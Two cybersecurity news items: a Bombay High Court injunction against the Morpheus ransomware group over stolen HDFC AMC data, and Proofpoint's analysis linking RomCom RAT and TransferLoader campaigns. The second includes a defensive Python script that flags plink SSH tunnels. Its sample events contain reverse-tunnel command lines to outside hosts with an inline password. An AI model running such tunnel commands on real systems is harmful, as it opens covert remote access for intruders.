
Bombay High Court Restrains ‘Morpheus’ Ransomware Group From Sharing HDFC AMC’s Stolen Data


The Bombay High Court has issued a temporary injunction against a ransomware group calling itself "Morpheus," preventing it from publishing, distributing, or revealing confidential information allegedly stolen from HDFC Asset Management Company (HDFC AMC).

The interim order was passed on May 29 by a vacation bench led by Justice Shreeram Shirsat, which observed that the company had established a prima facie case warranting immediate relief.

"If the confidential data is misused or leaked or traded or compromised, it will lead to dreadful consequences and it can cause irreparable and irreversible damage to the plaintiff company," the court said.

In addition to restraining the ransomware group from using or disclosing the data, the court directed the Union government to take appropriate measures to remove, block, disable, and delete online accounts associated with the stolen information.

The order came in response to a suit filed by HDFC Asset Management Company Limited seeking legal protection against the unidentified hackers. The company requested the court to prohibit the cybercriminals from sharing, publishing, or otherwise exploiting the confidential data allegedly taken during the cyberattack.

HDFC AMC also sought directions against the Department of Telecommunications and the Ministry of Electronics and Information Technology, urging them to take necessary action to eliminate online access points linked to the compromised data.

According to the petition, HDFC AMC provides investment management and advisory services to millions of HDFC Mutual Fund investors and oversees assets belonging to investors across the country. As part of its operations, the company maintains sensitive customer information, including names, addresses, identity records, PAN details, bank account information, and investment-related data.

The company informed the court that on May 16, its IT administrator detected unusual activity within its technology infrastructure. Further investigation led to the discovery of an email from an entity identifying itself as "Morpheus," which claimed to have extracted more than 680 GB of critical company data.

Following the incident, HDFC AMC said it immediately activated its cybersecurity response protocols to contain the breach and notified the Securities and Exchange Board of India (SEBI) about the incident.

The company argued that there remains a significant risk of the stolen information being leaked, which could expose millions of investors to identity theft, financial fraud, and other forms of cybercrime. It further contended that any public release of the data could severely impact its reputation and operations.

The matter is scheduled for further hearing before the Bombay High Court on June 16.

RomCom RAT and TransferLoader Attacks Reveal Alarming Parallels in Cyber Espionage and Ransomware Tactics


Cybersecurity experts have uncovered strategic overlaps between two advanced threat groups: the operators of the RomCom RAT and another entity linked to a malware loader known as TransferLoader.

According to enterprise security firm Proofpoint, the TransferLoader activity is being tracked under the alias UNK_GreenSec, while RomCom RAT operations are attributed to the group TA829—also identified in cybersecurity circles as CIGAR, Storm-0978, Nebulous Mantis, and Void Rabisu, among other names.

Proofpoint's investigation into TA829 led to the discovery of UNK_GreenSec, with both groups displaying a high degree of similarity in infrastructure setup, email lure themes, delivery methods, and landing pages. The company described "an unusual amount of similar infrastructure, delivery tactics, landing pages, and email lure themes" shared between the two clusters.

TA829 stands out in the cyber threat ecosystem for conducting both intelligence-gathering missions and financially driven cyberattacks. Believed to be aligned with Russian interests, the group has exploited zero-day vulnerabilities in Mozilla Firefox and Microsoft Windows to spread RomCom RAT to global victims.

Earlier this year, PRODAFT revealed that the threat actors behind RomCom RAT used stealthy techniques such as bulletproof hosting, encrypted C2 communication, and living-off-the-land (LOTL) tactics to avoid detection.

TransferLoader, meanwhile, was first analyzed by Zscaler’s ThreatLabz following a February 2025 campaign in which it was deployed to distribute Morpheus ransomware to an unnamed American law firm.

Proofpoint also noted that both TA829 and UNK_GreenSec use REM Proxy services hosted on compromised MikroTik routers as part of their upstream communication channels. However, the method of compromising these routers remains unknown.

"REM Proxy devices are likely rented to users to relay traffic," said the Proofpoint threat research team. "In observed campaigns, both TA829 and UNK_GreenSec use the service to relay traffic to new accounts at freemail providers to then send to targets."

Further analysis suggests that both actors may rely on an automated email builder to rapidly generate sender accounts, as evidenced by similarly formatted addresses such as ximajazehox333@gmail.com and hannahsilva1978@ukr.net.

The phishing messages commonly carry a malicious link, embedded either directly in the email body or inside a PDF attachment. Victims who click these links are redirected through services like Rebrandly and ultimately land on spoofed Google Drive or Microsoft OneDrive pages; these landing pages filter out sandbox environments and uninteresting systems before serving the next stage.

From here, the infection chain splits: victims redirected by UNK_GreenSec receive TransferLoader, while those targeted by TA829 are delivered a separate strain dubbed SlipScreen.

Both groups have reportedly used PuTTY’s PLINK utility to establish SSH tunnels and hosted payloads on IPFS (InterPlanetary File System) for further stages of their campaigns.
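The PLINK tunnelling noted above is one of the few behaviours in this chain that shows up plainly in endpoint process-creation telemetry. The following is an added example, not Proofpoint's or the blog's code: it scores constructed process-creation events (an assumed pipe-separated time|user|image|cmdline format, not any real product's log format) for plink-style SSH tunnel invocations, weighting reverse tunnels, renamed binaries, and passwords passed on the command line.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample events for illustration only; not real telemetry from the campaigns.
SAMPLE_EVENTS = [
    "2025-02-10T09:14:02Z|jdoe|C:\\Users\\jdoe\\AppData\\Local\\Temp\\plink.exe|plink.exe -ssh -N -R 8443:127.0.0.1:3389 -pw Pa55w0rd relay@203.0.113.10",
    "2025-02-10T09:20:45Z|admin|C:\\Program Files\\PuTTY\\plink.exe|plink.exe -ssh admin@10.0.0.5 uptime",
    "2025-02-10T09:22:13Z|jdoe|C:\\Users\\jdoe\\Downloads\\svchost.exe|svchost.exe -ssh -N -L 5900:127.0.0.1:5900 u@198.51.100.7",
    "2025-02-10T09:30:00Z|svc|C:\\Windows\\System32\\notepad.exe|notepad.exe report.txt",
]

# -R (reverse), -L (local) and -D (dynamic) port-forwarding switches, each followed by a spec.
TUNNEL_FLAG = re.compile(r"(?<!\S)-(R|L|D)\s+\S+")
# Switches characteristic of plink; two or more of them under another image name suggests a rename.
PLINK_ARGS = re.compile(r"(?<!\S)-(ssh|pw|hostkey|N)(?!\S)")

def analyse_event(line):
    """Return (score, reasons) for one event; score 0 means nothing noteworthy."""
    _time, _user, image, cmdline = line.split("|", 3)
    name = PureWindowsPath(image).name.lower()
    reasons, score = [], 0
    looks_like_plink = name == "plink.exe" or len(PLINK_ARGS.findall(cmdline)) >= 2
    if not looks_like_plink:
        return 0, reasons
    m = TUNNEL_FLAG.search(cmdline)
    if m:
        direction = {"R": "reverse", "L": "local", "D": "dynamic"}[m.group(1)]
        score += 3 if m.group(1) == "R" else 2  # reverse tunnels give an outside host a way in
        reasons.append(f"{direction} SSH tunnel ({m.group(0).strip()})")
    if name != "plink.exe":
        score += 2
        reasons.append(f"plink-style switches under unexpected image name {name}")
    if not image.lower().startswith("c:\\program files"):
        score += 1
        reasons.append("binary outside Program Files")
    if "-pw" in cmdline.split():
        score += 1
        reasons.append("password passed on command line")
    return score, reasons

def triage(events):
    """Keep only events worth an analyst's attention, highest score first."""
    hits = []
    for e in events:
        score, reasons = analyse_event(e)
        if score:
            hits.append((e.split("|", 3)[0], score, reasons))
    return sorted(hits, key=lambda h: -h[1])

if __name__ == "__main__":
    for when, score, why in triage(SAMPLE_EVENTS):
        print(when, score, "; ".join(why))
```

Plain interactive plink use from its install directory without a forwarding switch scores zero, so routine administration does not page anyone.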

SlipScreen serves as a stealthy loader that decrypts and injects shellcode directly into system memory, but only proceeds if it detects at least 55 recently accessed documents in the Windows Registry—an apparent method to evade sandbox detection.

"We assess that 55 is an arbitrary number chosen by the actor," said Greg Lesnewich, senior threat researcher at Proofpoint. "Previous versions checked for 100 documents. It’s unclear why this threshold changed."

The loader then drops malware such as MeltingClaw (aka DAMASCENED PEACOCK) or RustyClaw, which can install backdoors like ShadyHammock or DustyHammock. ShadyHammock is often used to deploy SingleCamper (also known as SnipBot), an evolved version of RomCom RAT. DustyHammock, in addition to system reconnaissance, can retrieve payloads from IPFS-based storage.

TransferLoader-linked campaigns have been seen using job application-themed lures, tricking victims into clicking on a fake resume link that initiates the download of TransferLoader from an IPFS-hosted webshare.

Designed for stealth, TransferLoader enables the silent deployment of additional malicious tools including Metasploit and Morpheus ransomware, a rebranded variant of HellCat ransomware.